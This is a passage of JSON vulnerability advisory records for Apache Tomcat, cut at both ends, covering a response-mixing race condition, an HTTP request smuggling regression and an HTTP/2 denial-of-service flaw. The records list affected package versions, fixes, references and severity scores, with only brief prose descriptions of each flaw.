"https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b1d7e2425d6fd2cebed40d318f9365b44546077e10949b01b1f8a0fb%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:10Z", "nvd_published_at": "2018-02-28T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6v52-mj5r-7j2m", "published": "2018-10-17T16:33:02Z", "modified": "2024-03-11T05:32:05.311159Z", "aliases": [ "CVE-2018-8037" ], "summary": "Apache Tomcat Race Condition vulnerability", "details": "If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. 
An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M9" }, { "fixed": "9.0.10" } ] } ], "versions": [ "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6v52-mj5r-7j2m/GHSA-6v52-mj5r-7j2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.5" }, { "fixed": "8.5.32" } ] } ], "versions": [ "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.30", "8.5.31", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6v52-mj5r-7j2m/GHSA-6v52-mj5r-7j2m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8037" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4c04369c287233ea2e8e5135f6c31d02e2d76293" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/ccf2e6bf5205561ad18c2300153e9173ec509d73" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ed4b9d791f9470e4c3de691dd0153a9ce431701b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f94eedf02b5973598ab3dbbd4504da588e9ba6cb" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2867" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180817-0001" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102808/http://www.securityfocus.com/bid/104894" }, { "type": "WEB", "url": "https://web.archive.org/web/20200515223903/http://www.securitytracker.com/id/1041376" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2868" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ee3af8a43cb019e7898c9330cc8e73306553a27f2e4735dfb522d39%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ee3af8a43cb019e7898c9330cc8e73306553a27f2e4735dfb522d39@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5d15316dfb4adf75d96d394745f8037533fa3bcc1ac8f619bf5c044c%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5d15316dfb4adf75d96d394745f8037533fa3bcc1ac8f619bf5c044c@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722090623.GA92700%40minotaur.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201808.mbox/%3C0c616b4d-4e81-e7f8-b81d-1bb4c575aa33%40apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "github_reviewed": 
true, "github_reviewed_at": "2020-06-16T21:20:12Z", "nvd_published_at": "2018-08-02T14:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-767j-jfh2-jvrc", "published": "2020-02-28T01:10:58Z", "modified": "2024-02-21T05:31:17.449525Z", "aliases": [ "CVE-2019-17569" ], "summary": "Potential HTTP request smuggling in Apache Tomcat", "details": "The refactoring present in Apache Tomcat versions 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.98" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.48" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.5.49", "8.5.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": 
"pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.28" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.29", "9.0.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.98" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.48" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.5.49", "8.5.50" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.28" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.29", "9.0.30" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-767j-jfh2-jvrc/GHSA-767j-jfh2-jvrc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17569" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r88def002c5c78534674ca67472e035099fbe088813d50062094a1390%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0005" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4673" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T16:19:11Z", "nvd_published_at": "2020-02-24T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7w75-32cg-r6g2", "published": "2024-03-13T18:31:34Z", "modified": "2025-10-29T15:11:35.481591Z", "aliases": [ "BIT-tomcat-2024-24549", "CVE-2024-24549" ], "related": [ "CGA-g2x6-g84w-c6fq", "CGA-g7h3-55hg-6wrj", "CGA-mr75-947f-r7wp" ], "summary": "Apache Tomcat Denial of Service due to improper input validation vulnerability for HTTP/2 requests", "details": "Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. 
When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.\n\nUsers are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M17" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0-M16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.19" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.18", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.86" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.85", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.99" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", 
"8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.98", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.99" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98" ], "database_specific": { 
"last_known_affected_version_range": "\u003c= 8.5.98", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.86" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.85", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.19" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", 
"10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M17" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0-M16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24549" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0cac540a882220231ba7a82330483cbd5f6b1f96" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/810f49d5ff6d64b704af85d5b8d0aab9ec3c83f5" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8e03be9f2698f2da9027d40b9e9c0c9429b74dc0" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d07c82194edb69d99b438828fe2cbfadbb207843" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2024/04/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UWIS5MMGYDZBLJYT674ZI5AWFHDZ46B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/736G4GPZWS2DSQO5WKXO3G6OMZKFEK55" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240402-0002" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/13/3" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2024-03-15T16:27:53Z", "nvd_published_at": "2024-03-13T16:15:29Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": 